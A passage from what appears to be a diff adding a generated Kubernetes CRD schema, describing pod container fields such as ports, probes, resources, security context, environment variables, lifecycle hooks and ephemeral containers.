a DNS_LABEL. Each container in a pod must have a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. Exposing a port here gives the system additional information about the network connections a container uses, but is primarily informational. Not specifying a port here DOES NOT prevent that port from being exposed. Any port which is listening on the default "0.0.0.0" address inside a container will be accessible from the network. Cannot be updated. + items: + description: ContainerPort represents a network port in a single container. + properties: + containerPort: + description: Number of port to expose on the pod's IP address. This must be a valid port number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external port to. + type: string + hostPort: + description: Number of port to expose on the host. If specified, this must be a valid port number, 0 < x < 65536. If HostNetwork is specified, this must match ContainerPort. Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an IANA_SVC_NAME and unique within the pod. Each named port in a pod must have a unique name. Name for the port that can be referred to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service readiness. Container will be removed from service endpoints if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'SecurityContext defines the security options the container should be run with. If set, the fields of SecurityContext override the equivalent fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false. + type: boolean + procMount: + description: procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + level: + description: Level is SELinux level label that applies to the container. + type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this container. If seccomp options are provided at both the pod & container level, the container options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod has successfully initialized. If specified, no other probes are executed until this completes successfully. If this probe fails, the Pod will be restarted, just as if the livenessProbe failed. This can be used to provide different probe parameters at the beginning of a Pod''s lifecycle, when it might take a long time to load data or warm a cache, than during steady-state operation. This cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false + type: boolean + terminationMessagePath: + description: 'Optional: Path at which the file to which the container''s termination message will be written is mounted into the container''s filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block devices to be used by the container. + items: + description: volumeDevice describes a mapping of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside of the container that the device will be mapped to. + type: string + name: + description: name must match the name of a persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting of a Volume within a container. + properties: + mountPath: + description: Path within the container at which the volume should be mounted. Must not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10. + type: string + name: + description: This must match the Name of a Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false. + type: boolean + subPath: + description: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. + type: string + required: + - name + type: object + type: array + dnsConfig: + description: Specifies the DNS parameters of a pod. Parameters specified here will be merged to the generated DNS configuration based on DNSPolicy. + properties: + nameservers: + description: A list of DNS name server IP addresses. This will be appended to the base nameservers generated from DNSPolicy. Duplicated nameservers will be removed. + items: + type: string + type: array + options: + description: A list of DNS resolver options. This will be merged with the base options generated from DNSPolicy. Duplicated entries will be removed. Resolution options given in Options will override those that appear in the base DNSPolicy. + items: + description: PodDNSConfigOption defines DNS resolver options of a pod. + properties: + name: + description: Required. + type: string + value: + type: string + type: object + type: array + searches: + description: A list of DNS search domains for host-name lookup. This will be appended to the base search paths generated from DNSPolicy. Duplicated search paths will be removed. + items: + type: string + type: array + type: object + dnsPolicy: + description: Set DNS policy for the pod. Defaults to "ClusterFirst". Valid values are 'ClusterFirstWithHostNet', 'ClusterFirst', 'Default' or 'None'. DNS parameters given in DNSConfig will be merged with the policy selected with DNSPolicy. To have DNS options set along with hostNetwork, you have to specify DNS policy explicitly to 'ClusterFirstWithHostNet'. + type: string + enableServiceLinks: + description: 'EnableServiceLinks indicates whether information about services should be injected into pod''s environment variables, matching the syntax of Docker links. Optional: Defaults to true.' + type: boolean + ephemeralContainers: + description: List of ephemeral containers run in this pod. Ephemeral containers may be run in an existing pod to perform user-initiated actions such as debugging. This list cannot be specified when creating a pod, and it cannot be modified by updating the pod spec. In order to add an ephemeral container to an existing pod, use the pod's ephemeralcontainers subresource. This field is alpha-level and is only honored by servers that enable the EphemeralContainers feature. + items: + description: An EphemeralContainer is a container that may be added temporarily to an existing pod for user-initiated activities such as debugging. Ephemeral containers have no resource or scheduling guarantees, and they will not be restarted when they exit or when a pod is removed or restarted. If an ephemeral container causes a pod to exceed its resource allocation, the pod may be evicted. Ephemeral containers may not be added by directly updating the pod spec. They must be added via the pod's ephemeralcontainers subresource, and they will appear in the pod spec once added. This is an alpha feature enabled by the EphemeralContainers feature flag. + properties: + args: + description: 'Arguments to the entrypoint. The docker image''s CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within a shell. The docker image''s ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set in the container. Cannot be updated. + items: + description: EnvVar represents an environment variable present in a Container. + properties: + name: + description: Name of the environment variable. Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) are expanded using the previously defined environment variables in the container and any service environment variables. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: supports metadata.name, metadata.namespace, `metadata.labels['''']`, `metadata.annotations['''']`, spec.nodeName, spec.serviceAccountName, status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, limits.ephemeral-storage, requests.cpu, requests.memory and requests.ephemeral-storage) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret in the pod's namespace + properties: + key: + description: The key of the secret to select from. Must be a valid secret key. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. + items: + description: EnvFromSource represents the source of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend to each key in the ConfigMap. Must be a C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Lifecycle is not allowed for ephemeral containers. + properties: + postStart: + description: 'PostStart is called immediately after a container is created. If the handler fails, the container is terminated and restarted according to its restart policy. Other management of the container blocks until the hook completes. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately before a container is terminated due to an API request or management event such as liveness/startup probe failure, preemption, resource contention, etc. The handler is not called if the container crashes or exits. The reason for termination is passed to the handler. The Pod''s termination grace period countdown begins before the PreStop hooked is executed. Regardless of the outcome of the handler, the container will eventually terminate within the Pod''s termination grace period. Other management of the container blocks until the hook completes or until the termination grace period is reached. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: Probes are not allowed for ephemeral containers. + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the ephemeral container specified as a DNS_LABEL. This name must be unique among all containers, init containers and ephemeral containers. + type: string + ports: + description: Ports are not allowed for ephemeral containers. + items: + description: ContainerPort represents a network port in a single container. + properties: + containerPort: + description: Number of port to expose on the pod's IP address. This must be a valid port number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external port to. + type: string + hostPort: + description: Number of port to expose on the host. If specified, this must be a valid port number, 0 < x < 65536. If HostNetwork is specified, this must match ContainerPort. Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an IANA_SVC_NAME and unique within the pod. Each named port in a pod must have a unique name. Name for the port that can be referred to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + readinessProbe: + description: Probes are not allowed for ephemeral containers. + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive 